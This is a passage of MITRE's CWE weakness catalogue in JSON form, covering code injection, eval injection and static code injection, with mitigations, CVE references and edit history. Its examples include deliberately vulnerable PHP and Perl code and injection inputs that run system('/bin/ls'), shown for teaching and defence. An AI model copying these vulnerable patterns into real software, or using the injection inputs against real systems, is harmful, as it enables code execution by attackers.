effectively restrict which code can be executed by your software.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit()."]}},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = $_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"&lt;b&gt;$name&lt;/b&gt; says \'$message\'&lt;hr&gt;\\\\n\\");fclose($handle);echo \\"Message Saved!&lt;p&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;?php system(\\"/bin/ls -l\\");?&gt;"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this situation."]},{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2002-0495","Description":"Perl code directly injected into CGI library file from parameters to another CGI program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495"},{"Reference":"CVE-2005-1876","Description":"Direct PHP code injection into supporting template file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1876"},{"Reference":"CVE-2005-1894","Description":"Direct code injection into PHP script that can be accessed by attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1894"},{"Reference":"CVE-2003-0395","Description":"PHP code from User-Agent HTTP header directly inserted into log file implemented as PHP script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0395"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"CODE","Entry_Name":"Code Evaluation and Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"242"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 3: Web-Client Related Vulnerabilities (XSS).&#34; Page 63"}}},"Notes":{"Note":{"#text":"Many of these weaknesses are under-studied and under-researched, and terminology is not sufficiently precise.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Code Injection","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Control Generation of Code (aka \'Code Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Control Generation of Code (\'Code Injection\')","attr":{"@_Date":"2011-03-29"}}]}},"95":{"attr":{"@_ID":"95","@_Name":"Improper Neutralization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \\"eval\\").","Extended_Description":"This may allow an attacker to execute arbitrary code, or at least modify what code can be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If possible, refactor your code so that it does not need to use eval() at all."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-31"},"Intro_Text":"edit-config.pl: This CGI script is used to modify settings in a configuration file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);sub config_file_add_key {}sub config_file_set_key {}sub config_file_delete_key {}sub handleConfigAction {}$configfile = \\"/home/cwe/config.txt\\";print header;if (defined(param(\'action\'))) {}else {}","xhtml:br":["","","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to add a field/key to a file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to set key to a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $key, $arg) = @_;","xhtml:br":["","",""],"xhtml:i":"# code to delete key from a particular file goes here"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"my ($fname, $action) = @_;my $key = param(\'key\');my $val = param(\'val\');my $code = \\"config_file_$action_key(\\\\$fname, \\\\$key, \\\\$val);\\";eval($code);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["# this is super-efficient code, especially if you have to invoke","# any one of dozens of different functions!"]}},{"#text":"handleConfigAction($configfile, param(\'action\'));","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"No action specified!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"add_key(\\",\\",\\"); system(\\"/bin/ls\\");"},{"attr":{"@_Nature":"result"},"xhtml:div":"config_file_add_key(\\",\\",\\"); system(\\"/bin/ls\\");"}],"Body_Text":["The script intends to take the \'action\' parameter and invoke one of a variety of functions based on the value of that parameter - config_file_add_key(), config_file_set_key(), or config_file_delete_key(). It could set up a conditional to invoke each function separately, but eval() is a powerful way of doing the same thing in fewer lines of code, especially when a large number of functions or variables are involved. Unfortunately, in this case, the attacker can provide other values in the action parameter, such as:","This would produce the following string in handleConfigAction():","Any arbitrary Perl code could be added after the attacker has \\"closed off\\" the construction of the original function call, in order to prevent parsing errors from causing the malicious eval() to fail before the attacker\'s payload is activated. This particular manipulation would fail after the system() call, because the \\"_key(\\\\$fname, \\\\$key, \\\\$val)\\" portion of the string would cause an error, but this is irrelevant to the attack because the payload has already been activated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5071","Description":"Eval injection in PHP program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5071"},{"Reference":"CVE-2002-1750","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750"},{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2002-1752","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752"},{"Reference":"CVE-2002-1753","Description":"Eval injection in Perl program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753"},{"Reference":"CVE-2005-1527","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1527"},{"Reference":"CVE-2005-2837","Description":"Direct code injection into Perl eval function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2837"},{"Reference":"CVE-2005-1921","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921"},{"Reference":"CVE-2005-2498","Description":"MFV. code injection into PHP eval statement using nested constructs that should not be nested.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2498"},{"Reference":"CVE-2005-3302","Description":"Code injection into Python eval statement from a field in a formatted file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3302"},{"Reference":"CVE-2007-1253","Description":"Eval injection in Python program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253"},{"Reference":"CVE-2001-1471","Description":"chain: Resultant eval injection. An invalid value prevents initialization of variables, which can be modified by attacker and later injected into PHP eval statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Dynamic Code Evaluation (\'Eval Injection\')"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS35-PL","Entry_Name":"Do not invoke the eval form with a string argument","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"35"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 18, &#34;Inline Evaluation&#34;, Page 1095"}}},"Notes":{"Note":[{"#text":"Factors: special character errors can play a role in increasing the variety of code that can be injected, although some vulnerabilities do not require special characters at all, e.g. when a single function without arguments can be referenced and a terminator character is not necessary.","attr":{"@_Type":"Other"}},{"#text":"This issue is probably under-reported. Most relevant CVEs have been for Perl and PHP, but eval injection applies to most interpreted languages. Javascript eval injection is likely to be heavily under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Name, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Direct Dynamic Code Evaluation (\'Eval Injection\')","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Dynamically Evaluated Code (aka \'Eval Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Dynamically Evaluated Code (\'Eval Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"96":{"attr":{"@_ID":"96","@_Name":"Improper Neutralization of Directives in Statically Saved Code (\'Static Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue is most frequently found in PHP applications that allow users to set configuration variables that are stored within executable PHP files. Technically, this could also be performed in some compiled code (e.g. by byte-patching an executable), although it is highly unlikely."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"The injected code could access restricted data / files."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Strategy":"Output Encoding","Description":"Perform proper output validation and escaping to neutralize all code syntax from data written to code files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = 